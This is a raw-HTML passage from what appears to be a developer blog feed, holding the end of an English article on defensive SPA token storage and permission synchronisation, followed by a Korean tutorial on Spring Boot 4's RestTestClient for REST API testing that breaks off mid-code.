class="s2">"update"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Article"</span><span class="p">,</span><span class="w"> </span><span class="nl">"conditions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"authorId"</span><span class="p">:</span><span class="w"> </span><span class="s2">"${user.id}"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"draft"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"delete"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subject"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Comment"</span><span class="p">,</span><span class="w"> </span><span class="nl">"inverted"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p><strong>Interpretation:</strong></p> <ul> <li>Can read all Articles</li> <li>Can update Articles only if author is self and status is draft</li> <li>Can never delete Comments (inverted: true → Deny rule)</li> </ul> <h2 id="synchronization-strategy">Synchronization Strategy</h2> <p><strong>Core Principle: “Security on the server, UX on the client”</strong></p> <ol> <li> <p><strong>API Is the Source of Truth:</strong> Actual data access control must be performed on the API server. Frontend logic can be bypassed, so never trust it.</p> </li> <li> <p><strong>Synchronization Mechanism:</strong> When users log in or load pages, call an endpoint like <code class="language-plaintext highlighter-rouge">/api/my-permissions</code> to fetch the permission JSON.</p> </li> <li> <p><strong>UI Control:</strong> Store the received JSON in a global state manager like Pinia (Vue) or Context API (React). Then control the UI with custom directives or components:</p> </li> </ol> <div class="language-vue highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- Vue example --&gt;</span> <span class="nt">&lt;button</span> <span class="na">v-can=</span><span class="s">"'update', post"</span><span class="nt">&gt;</span>Edit Post<span class="nt">&lt;/button&gt;</span> </code></pre></div></div> <div class="language-jsx highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// React example</span> <span class="p">&lt;</span><span class="nc">Can</span> <span class="na">I</span><span class="p">=</span><span class="s">"create"</span> <span class="na">a</span><span class="p">=</span><span class="s">"Project"</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nc">CreateButton</span> <span class="p">/&gt;</span> <span class="p">&lt;/</span><span class="nc">Can</span><span class="p">&gt;</span> </code></pre></div></div> <p>Hide or disable buttons for users without permissions. But remember: <strong>this is just UX.</strong> Real security happens on the backend!</p> <hr /> <h1 id="conclusion-and-practical-recommendations">Conclusion and Practical Recommendations</h1> <p>The SPA security landscape in 2025 requires much more sophisticated architecture than before. Browser constraints are tightening, and attack techniques are becoming more advanced.</p> <h2 id="key-takeaways">Key Takeaways</h2> <h3 id="1-adopt-bff-pattern-top-priority-">1. Adopt BFF Pattern (Top Priority) 🏆</h3> <p>If you’re building security-critical business applications, adopt the BFF pattern that <strong>completely removes tokens from the browser</strong>. It’s currently the only and most powerful architecture that can fundamentally prevent account hijacking via XSS.</p> <h3 id="2-use-httponly-cookies">2. Use HttpOnly Cookies</h3> <p>Use cookies with <code class="language-plaintext highlighter-rouge">HttpOnly</code>, <code class="language-plaintext highlighter-rouge">Secure</code>, and <code class="language-plaintext highlighter-rouge">SameSite</code> attributes instead of LocalStorage for token storage. Block script access to maximize security.</p> <h3 id="3-pkce-and-token-rotation-second-best">3. PKCE and Token Rotation (Second Best)</h3> <p>If BFF adoption is impossible (Serverless environments, etc.), use PKCE-based Authorization Code Flow, but <strong>always implement refresh token rotation and reuse detection mechanisms</strong>. This minimizes damage from token theft.</p> <h3 id="4-granular-permission-synchronization">4. Granular Permission Synchronization</h3> <p>Go beyond simple RBAC to synchronize frontend-backend with Permission JSON structures including conditions. But always perform final authorization checks on the backend API!</p> <h2 id="future-outlook">Future Outlook</h2> <p>Web security will extend Zero Trust principles to the client side. Browsers will become increasingly closed environments (complete death of third-party cookies), and mastering new standard technologies like partitioned cookies (CHIPS) or Storage Access API will become essential.</p> <p>Additionally, application-layer security protocols like <strong>DPoP (Demonstrating Proof-of-Possession)</strong> that bind tokens to specific clients will gradually become mainstream.</p> <hr /> <h1 id="final-thoughts">Final Thoughts</h1> <p>SPA security goes beyond simply “where to store tokens.” You need to embed security from the architecture design phase (Security by Design).</p> <p>If you’re starting an SPA project after a while or need to improve legacy system security, bookmark this article. It’ll help when you need it! 🚀</p> <hr /> <h1 id="appendix-quick-reference">Appendix: Quick Reference</h1> <h2 id="storage-selection-guide">Storage Selection Guide</h2> <table> <thead> <tr> <th>Situation</th> <th>Recommended Approach</th> <th>Reason</th> </tr> </thead> <tbody> <tr> <td>Production Environment</td> <td>BFF + HttpOnly Cookie</td> <td>Complete XSS defense</td> </tr> <tr> <td>Serverless SPA</td> <td>PKCE + Token Rotation</td> <td>Second best when backend unavailable</td> </tr> <tr> <td>Dev/Test Environment</td> <td>LocalStorage (temporary)</td> <td>Convenience, but must replace before production</td> </tr> <tr> <td>Embedded Widgets</td> <td>CHIPS utilization</td> <td>Bypass third-party cookie blocking</td> </tr> </tbody> </table> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Thu, 22 Jan 2026 11:00:00 +0900 http://thecodinglog.github.io/security/2026/01/22/spa-security-eng.html http://thecodinglog.github.io/security/2026/01/22/spa-security-eng.html Security SPA Security Spring Boot 4 REST API 테스팅, 이 글 하나로 정리하기 🧪 <p>Spring Boot 4가 출시되면서 REST API 테스팅 방식이 또 바뀌었습니다. MockMvc는 장황하고, TestRestTemplate은 곧 사라질 예정이고, WebTestClient는 리액티브 의존성이 필요하죠. “도대체 뭘 써야 하나?” 싶으셨다면, 이 글이 답입니다. Spring Framework 7의 새로운 표준, <strong>RestTestClient</strong>를 완벽히 정리했습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="왜-또-새로운-테스팅-도구인가">왜 또 새로운 테스팅 도구인가?</h1> <p>2025년 11월, Spring Boot 4.0과 Spring Framework 7.0이 정식 출시되었습니다. 지난 10년간 자바 웹 개발은 안정성과 확장성을 중심으로 발전했지만, 테스팅 도구는 파편화되어 있었습니다.</p> <h2 id="기존-도구들의-문제점">기존 도구들의 문제점</h2> <h3 id="mockmvc-빠르지만-장황하다">MockMvc: 빠르지만 장황하다</h3> <p>MockMvc는 서블릿 컨테이너를 띄우지 않고 DispatcherServlet을 직접 호출해서 빠릅니다. 하지만 API가 정적 빌더 패턴에 의존적이고 장황하죠.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mockMvc</span><span class="o">.</span><span class="na">perform</span><span class="o">(</span><span class="n">get</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">))</span> <span class="o">.</span><span class="na">andExpect</span><span class="o">(</span><span class="n">status</span><span class="o">().</span><span class="na">isOk</span><span class="o">())</span> <span class="o">.</span><span class="na">andExpect</span><span class="o">(</span><span class="n">jsonPath</span><span class="o">(</span><span class="s">"$.title"</span><span class="o">).</span><span class="na">value</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">));</span> </code></pre></div></div> <p>게다가 실제 HTTP 통신을 하지 않아서 네트워크 레이어의 직렬화/역직렬화 문제나 프록시 이슈를 감지하지 못합니다.</p> <h3 id="testresttemplate-곧-사라질-레거시">TestRestTemplate: 곧 사라질 레거시</h3> <p>실제 서버를 띄워서 통합 테스트를 하는 TestRestTemplate은 RestTemplate 기반의 명령형 스타일입니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">ResponseEntity</span><span class="o">&lt;</span><span class="nc">Book</span><span class="o">&gt;</span> <span class="n">response</span> <span class="o">=</span> <span class="n">restTemplate</span><span class="o">.</span><span class="na">getForEntity</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">,</span> <span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">response</span><span class="o">.</span><span class="na">getStatusCode</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="nc">HttpStatus</span><span class="o">.</span><span class="na">OK</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">response</span><span class="o">.</span><span class="na">getBody</span><span class="o">().</span><span class="na">getTitle</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">);</span> </code></pre></div></div> <p>ResponseEntity를 수동으로 언래핑하고 별도의 어설션 라이브러리로 검증해야 하는 번거로움이 있습니다. 게다가 Spring 6.1 이후 RestTemplate이 유지보수 모드에 진입했고, 향후 Deprecated될 예정입니다.</p> <h3 id="webtestclient-좋지만-의존성-문제">WebTestClient: 좋지만 의존성 문제</h3> <p>리액티브 스택(WebFlux)용으로 설계된 WebTestClient는 직관적인 Fluent API를 제공합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">webTestClient</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getTitle</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">));</span> </code></pre></div></div> <p>개발자들이 좋아했지만 문제가 있습니다. Spring MVC 애플리케이션을 테스트하는데도 불필요한 리액티브 의존성(Reactor Netty 등)을 추가해야 하거나 클래스패스 충돌이 발생할 수 있습니다.</p> <hr /> <h1 id="resttestclient-모든-문제를-해결하는-통합-인터페이스">RestTestClient: 모든 문제를 해결하는 통합 인터페이스</h1> <p>RestTestClient는 이 모든 파편화를 해결하기 위해 설계되었습니다. 내부적으로 동기식 HTTP 클라이언트인 RestClient를 래핑하면서도, 테스트 검증을 위한 풍부한 어설션 API를 제공합니다.</p> <p><strong>가장 큰 특징: 단일 API로 모든 테스팅 시나리오를 커버합니다.</strong></p> <p><code class="language-plaintext highlighter-rouge">bindTo</code> 메서드로 실행 전략(Mock vs Real Server)만 바꾸면, 요청을 구성하고 응답을 검증하는 API는 동일하게 유지됩니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Mock 환경</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span><span class="o">.</span><span class="na">bindToController</span><span class="o">(</span><span class="k">new</span> <span class="nc">BookController</span><span class="o">()).</span><span class="na">build</span><span class="o">();</span> <span class="c1">// 실제 서버 환경 (같은 API!)</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span><span class="o">.</span><span class="na">bindToServer</span><span class="o">(</span><span class="s">"http://localhost:8080"</span><span class="o">).</span><span class="na">build</span><span class="o">();</span> <span class="c1">// 사용법은 동일</span> <span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getTitle</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">));</span> </code></pre></div></div> <p>단위 테스트부터 E2E 테스트까지 일관된 문법으로 작성할 수 있어 학습 곡선이 낮고 테스트 코드의 가독성이 비약적으로 향상됩니다.</p> <hr /> <h1 id="resttestclient-아키텍처-바인딩-전략이-핵심">RestTestClient 아키텍처: 바인딩 전략이 핵심</h1> <p>RestTestClient의 설계 철학은 ‘유창함(Fluency)’과 ‘조합성(Composability)’입니다. 단순히 메서드 체이닝을 넘어, 테스트의 의도를 명확히 드러내는 도메인 특화 언어(DSL)에 가깝습니다.</p> <h2 id="바인딩-메서드-실행-엔진을-선택하라">바인딩 메서드: 실행 엔진을 선택하라</h2> <p>RestTestClient 인스턴스는 <code class="language-plaintext highlighter-rouge">RestTestClient.bindToXxx()</code> 형태의 정적 팩토리 메서드로 생성합니다. 이 바인딩 단계에서 요청을 처리할 ‘백엔드 엔진’이 결정됩니다.</p> <table> <thead> <tr> <th>바인딩 메서드</th> <th>내부 처리 엔진</th> <th>주요 용도</th> <th>비고</th> </tr> </thead> <tbody> <tr> <td><code class="language-plaintext highlighter-rouge">bindToController</code></td> <td>Standalone MockMvc</td> <td>단위 테스트, 라우팅 검증</td> <td>컨테이너 로딩 없음 (초고속)</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">bindToMockMvc</code></td> <td>MockMvc Wrapper</td> <td>레거시 마이그레이션, 보안 검증</td> <td>기존 MockMvc 설정 재사용</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">bindToApplicationContext</code></td> <td>Full Context MockMvc</td> <td>통합 테스트, 빈 상호작용 검증</td> <td>컨텍스트 로딩 필요</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">bindToServer</code></td> <td>RestClient (Network)</td> <td>E2E 테스트, 실제 HTTP 통신</td> <td>실제 서버 구동 필요</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">bindToRouterFunction</code></td> <td>RouterFunction Invoker</td> <td>함수형 엔드포인트 테스트</td> <td>WebFlux/MVC 함수형 스타일</td> </tr> </tbody> </table> <p>이 설계는 “Write Once, Run Anywhere”처럼, 동일한 테스트 로직을 다양한 실행 환경에 적용할 수 있는 유연성을 제공합니다.</p> <h2 id="요청-교환-검증-흐름-request-exchange-assert">요청-교환-검증 흐름 (Request-Exchange-Assert)</h2> <p>RestTestClient 사용 흐름은 세 단계로 구분됩니다.</p> <h3 id="1-request-specification-요청-명세">1. Request Specification (요청 명세)</h3> <p>HTTP 메서드, URI, 헤더, 바디를 설정합니다. RestClient API와 거의 유사합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">post</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/users"</span><span class="o">)</span> <span class="o">.</span><span class="na">contentType</span><span class="o">(</span><span class="nc">MediaType</span><span class="o">.</span><span class="na">APPLICATION_JSON</span><span class="o">)</span> <span class="o">.</span><span class="na">body</span><span class="o">(</span><span class="n">newUser</span><span class="o">)</span> </code></pre></div></div> <h3 id="2-exchange-교환">2. Exchange (교환)</h3> <p><code class="language-plaintext highlighter-rouge">exchange()</code> 메서드를 호출하여 요청을 실행하고 응답 컨텍스트로 전환합니다. 이 메서드 명명은 WebTestClient와의 통일성을 위해 선택되었습니다.</p> <h3 id="3-response-assertion-응답-검증">3. Response Assertion (응답 검증)</h3> <p>반환된 ResponseSpec을 통해 상태 코드, 헤더, 바디를 체이닝 방식으로 검증합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isCreated</span><span class="o">()</span> <span class="o">.</span><span class="na">expectHeader</span><span class="o">().</span><span class="na">contentType</span><span class="o">(</span><span class="nc">MediaType</span><span class="o">.</span><span class="na">APPLICATION_JSON</span><span class="o">)</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">User</span><span class="o">.</span><span class="na">class</span><span class="o">).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="n">expectedUser</span><span class="o">);</span> </code></pre></div></div> <hr /> <h1 id="바인딩-전략-심층-분석-언제-무엇을-쓸까">바인딩 전략 심층 분석: 언제 무엇을 쓸까?</h1> <p>각 바인딩 전략의 내부 동작 원리와 최적 사용 시나리오를 이해해야 RestTestClient를 효과적으로 활용할 수 있습니다.</p> <h2 id="bindtocontroller-초고속-단위-테스트">bindToController: 초고속 단위 테스트</h2> <p>스프링 컨테이너 전체를 로딩하지 않고, 필요한 컨트롤러 인스턴스만 등록하여 테스트합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Test</span> <span class="kt">void</span> <span class="nf">testGetBook</span><span class="o">()</span> <span class="o">{</span> <span class="nc">BookService</span> <span class="n">mockService</span> <span class="o">=</span> <span class="n">mock</span><span class="o">(</span><span class="nc">BookService</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">when</span><span class="o">(</span><span class="n">mockService</span><span class="o">.</span><span class="na">getBook</span><span class="o">(</span><span class="mi">1L</span><span class="o">)).</span><span class="na">thenReturn</span><span class="o">(</span><span class="k">new</span> <span class="nc">Book</span><span class="o">(</span><span class="mi">1L</span><span class="o">,</span> <span class="s">"Spring Boot 4"</span><span class="o">));</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span> <span class="o">.</span><span class="na">bindToController</span><span class="o">(</span><span class="k">new</span> <span class="nc">BookController</span><span class="o">(</span><span class="n">mockService</span><span class="o">))</span> <span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">title</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">));</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작 원리:</strong> 내부적으로 <code class="language-plaintext highlighter-rouge">MockMvcBuilders.standaloneSetup()</code>을 사용합니다. 스프링의 전체 빈 생명주기를 거치지 않고, 수동으로 생성된 컨트롤러 객체와 최소한의 MVC 인프라(Converter, Resolver)만 구성하여 가상의 DispatcherServlet을 구동합니다.</p> <p><strong>장점:</strong> 실행 속도가 매우 빠릅니다. 서비스 계층이나 데이터 액세스 계층을 Mockito로 모킹하여 컨트롤러 로직(요청 매핑, 파라미터 바인딩, 리턴 값 처리)에만 집중할 수 있습니다.</p> <p><strong>한계:</strong> <code class="language-plaintext highlighter-rouge">@ControllerAdvice</code>나 전역 필터, 보안 설정 등이 자동으로 적용되지 않으므로, 이를 테스트하려면 수동으로 추가 설정해야 합니다.</p> <h2 id="bindtomockmvc-레거시와-모던의-가교">bindToMockMvc: 레거시와 모던의 가교</h2> <p>이미 MockMvc를 사용하여 복잡한 설정을 구축해 둔 프로젝트라면, <code class="language-plaintext highlighter-rouge">bindToMockMvc</code>가 가장 현실적인 마이그레이션 경로입니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SpringBootTest</span> <span class="nd">@AutoConfigureMockMvc</span> <span class="kd">class</span> <span class="nc">BookControllerTest</span> <span class="o">{</span> <span class="nd">@Autowired</span> <span class="kd">private</span> <span class="nc">MockMvc</span> <span class="n">mockMvc</span><span class="o">;</span> <span class="nd">@Test</span> <span class="kt">void</span> <span class="nf">testWithSecurity</span><span class="o">()</span> <span class="o">{</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span><span class="o">.</span><span class="na">bindTo</span><span class="o">(</span><span class="n">mockMvc</span><span class="o">).</span><span class="na">build</span><span class="o">();</span> <span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작 원리:</strong> 기존에 구성된 MockMvc 인스턴스를 RestTestClient가 감싸는(Wrapper) 형태입니다. 요청 실행은 MockMvc가 담당하고, API 인터페이스만 RestTestClient의 유창한 스타일을 사용합니다.</p> <p><strong>활용 전략:</strong> Spring Security 설정, 커스텀 필터 체인, 복잡한 인코딩 설정이 포함된 기존 MockMvc 빌더를 그대로 재사용하면서, 테스트 코드의 가독성만 개선할 수 있습니다. 특히 보안 검증 시 <code class="language-plaintext highlighter-rouge">SecurityMockMvcConfigurers</code>와의 호환성이 보장되므로 권장됩니다.</p> <h2 id="bindtoapplicationcontext-완벽한-통합-테스트">bindToApplicationContext: 완벽한 통합 테스트</h2> <p>실제 애플리케이션과 가장 유사한 환경을 Mock 기반으로 제공합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SpringBootTest</span> <span class="kd">class</span> <span class="nc">BookIntegrationTest</span> <span class="o">{</span> <span class="nd">@Autowired</span> <span class="kd">private</span> <span class="nc">WebApplicationContext</span> <span class="n">context</span><span class="o">;</span> <span class="nd">@Test</span> <span class="kt">void</span> <span class="nf">testFullIntegration</span><span class="o">()</span> <span class="o">{</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span> <span class="o">.</span><span class="na">bindToApplicationContext</span><span class="o">(</span><span class="n">context</span><span class="o">)</span> <span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="n">client</span><span class="o">.</span><span class="na">post</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books"</span><span class="o">)</span> <span class="o">.</span><span class="na">contentType</span><span class="o">(</span><span class="nc">MediaType</span><span class="o">.</span><span class="na">APPLICATION_JSON</span><span class="o">)</span> <span class="o">.</span><span class="na">body</span><span class="o">(</span><span class="k">new</span> <span class="nc">Book</span><span class="o">(</span><span class="kc">null</span><span class="o">,</span> <span class="s">"New Book"</span><span class="o">))</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isCreated</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작 원리:</strong> <code class="language-plaintext highlighter-rouge">@SpringJUnitConfig</code> 또는 <code class="language-plaintext highlighter-rouge">@SpringBootTest</code>를 통해 로딩된 WebApplicationContext를 주입받아 전체 빈을 스캔하고 구성합니다.</p> <p><strong>Context Pausing (Spring 7 신기능):</strong> Spring Framework 7에서는 컨텍스트 캐싱 기능이 개선되어, 사용되지 않는 컨텍스트를 일시 중지(Pause)시키는 기능이 도입되었습니다. 이는 대규모 통합 테스트 슈트 실행 시 메모리 사용량을 획기적으로 줄여주며, <code class="language-plaintext highlighter-rouge">bindToApplicationContext</code> 사용 시의 리소스 부담을 완화해줍니다.</p> <p><strong>장점:</strong> 실제 빈들이 모두 연결되어 동작하므로, 컨트롤러에서 서비스, 리포지토리로 이어지는 데이터 흐름을 검증하기에 적합합니다.</p> <h2 id="bindtoserver-진짜-e2e-테스트">bindToServer: 진짜 E2E 테스트</h2> <p>RestTestClient의 진정한 강력함을 보여주는 모드입니다. Mock이 아닌 실제 HTTP 통신을 수행합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SpringBootTest</span><span class="o">(</span><span class="n">webEnvironment</span> <span class="o">=</span> <span class="nc">WebEnvironment</span><span class="o">.</span><span class="na">RANDOM_PORT</span><span class="o">)</span> <span class="kd">class</span> <span class="nc">BookE2ETest</span> <span class="o">{</span> <span class="nd">@LocalServerPort</span> <span class="kd">private</span> <span class="kt">int</span> <span class="n">port</span><span class="o">;</span> <span class="nd">@Test</span> <span class="kt">void</span> <span class="nf">testRealServer</span><span class="o">()</span> <span class="o">{</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span> <span class="o">.</span><span class="na">bindToServer</span><span class="o">(</span><span class="s">"http://localhost:"</span> <span class="o">+</span> <span class="n">port</span><span class="o">)</span> <span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">title</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">));</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>동작 원리:</strong> 내부적으로 JDK HttpClient, Apache HttpClient, 또는 Jetty Client 등을 사용하는 RestClient를 통해 실제 네트워크 소켓으로 요청을 전송합니다.</p> <p><strong>비교 우위:</strong> MockMvc는 서블릿 컨테이너(Tomcat/Jetty)의 동작(필터, 에러 페이지 렌더링, 실제 HTTP 헤더 처리)을 완벽하게 모사하지 못합니다. 반면 <code class="language-plaintext highlighter-rouge">bindToServer</code>는 실제 서버와 통신하므로, 네트워크 타임아웃, 프록시 설정, SSL/TLS 핸드셰이크, 실제 JSON 직렬화/역직렬화 호환성 등을 완벽하게 검증할 수 있습니다.</p> <p><strong>Virtual Threads:</strong> Spring Boot 4의 Java 21+ 지원과 맞물려, <code class="language-plaintext highlighter-rouge">bindToServer</code>를 사용하는 테스트 클라이언트는 가상 스레드(Virtual Threads)를 활용하여 블로킹 I/O 성능을 극대화할 수 있습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="마이그레이션-가이드-testresttemplate--resttestclient">마이그레이션 가이드: TestRestTemplate → RestTestClient</h1> <p>Spring Boot 4.0으로의 업그레이드는 TestRestTemplate을 제거하고 RestTestClient로 전환하는 작업을 수반합니다. TestRestTemplate은 향후 버전에서 제거될 예정이므로 조기 마이그레이션이 권장됩니다.</p> <h2 id="의존성-관리-및-모듈화">의존성 관리 및 모듈화</h2> <p>Spring Boot 4.0은 전체 코드베이스의 모듈화를 단행했습니다. RestTestClient를 사용하려면 올바른 의존성 설정이 필수입니다.</p> <p><strong>모듈 분리:</strong> RestTestClient는 <code class="language-plaintext highlighter-rouge">org.springframework.boot:spring-boot-resttestclient</code> 모듈에 포함되어 있습니다. 런타임 시 동기식 HTTP 클라이언트 기능을 위해 <code class="language-plaintext highlighter-rouge">org.springframework.boot:spring-boot-restclient</code> 의존성이 필요합니다.</p> <p><strong>스타터 패키지:</strong> 일반적으로 <code class="language-plaintext highlighter-rouge">spring-boot-starter-test</code>에 포함되어 제공되지만, 특정 의존성을 제외하거나 커스텀 스타터를 구성하는 경우 명시적으로 추가해야 할 수 있습니다.</p> <p><strong>레거시 지원:</strong> 마이그레이션 과도기 동안 기존 테스트가 깨지는 것을 방지하기 위해, <code class="language-plaintext highlighter-rouge">@AutoConfigureTestRestTemplate</code> 어노테이션으로 기존 TestRestTemplate 빈을 활성화할 수 있습니다. 새로운 클라이언트는 <code class="language-plaintext highlighter-rouge">@AutoConfigureRestTestClient</code>를 통해 주입받습니다.</p> <h2 id="코드-변환-패턴">코드 변환 패턴</h2> <p>기존의 명령형 코드를 선언형 코드로 변환하는 패턴을 익히면 마이그레이션 효율이 높아집니다.</p> <h3 id="예제-1-단순-get-요청">예제 1: 단순 GET 요청</h3> <p><strong>Legacy (TestRestTemplate):</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">ResponseEntity</span><span 